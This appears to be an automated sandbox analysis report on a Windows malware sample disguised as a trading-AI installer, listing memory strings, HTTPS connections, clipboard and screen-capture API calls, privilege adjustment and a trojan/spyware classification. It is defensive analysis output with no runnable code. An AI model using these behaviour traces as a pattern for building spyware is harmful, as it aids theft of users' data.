      Source: taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assured
      Source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1842719957.000000000018F000.00000004.00000010.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1842719957.000000000018F000.00000004.00000010.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018370501.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016484803.000000000124E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2016815643.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi
      Source: taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi_
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928852381.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927618857.000000000099D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2024149236.000000000125C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digice
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, 
taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927843019.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928682372.000000000099D000.00000004.00000020.00020000.00000000.sdmp, 
      Source: taskshosts.exe, 0000000F.00000003.1933674558.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977960530.0000000003070000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2026766272.000000000124F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064641634.0000000002B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
      Source: taskshosts.exe, 00000010.00000003.1945392433.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977713653.0000000002990000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945195148.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2030520486.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064373901.0000000002A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknown HTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 135.181.116.240:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 21_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 21_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

      System Summary

      Source: DontSleep_x64.zip.3.dr Zip Entry: encrypted
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: 6_2_00278752: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Process token adjusted: Security
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: String function: 00682340 appears 86 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: String function: 00682290 appears 194 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: String function: 00689710 appears 44 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: String function: 006987DB appears 58 times
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: String function: 0068A140 appears 100 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: String function: 0041C2A0 appears 176 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: String function: 0040C8C0 appears 71 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: String function: 00271DFC appears 37 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: String function: 00271E30 appears 88 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: String function: 003150F0 appears 741 times
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: String function: 00272A44 appears 47 times
      Source: XS_Trade_AI-newest_release_.exe Static PE information: invalid certificate
      Source: XS_Trade_AI-newest_release_.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: XS_Trade_AI-newest_release_.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785573250.000000007F9B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000000.1782909326.00000000004B8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1844353581.0000000002338000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785088094.0000000002510000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe, 00000002.00000003.1924488149.0000000002218000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe Binary or memory string: OriginalFileName vs XS_Trade_AI-newest_release_.exe
      Source: XS_Trade_AI-newest_release_.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: DontSleep_x64.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9952699829931972
      Source: DontSleep_x64.exe.3.dr Static PE information: Section: .data ZLIB complexity 0.9952699829931972
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/56@4/4
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe Code function: 15_2_006865B0 GetLastError,FormatMessageW
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: 6_2_0028458B __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
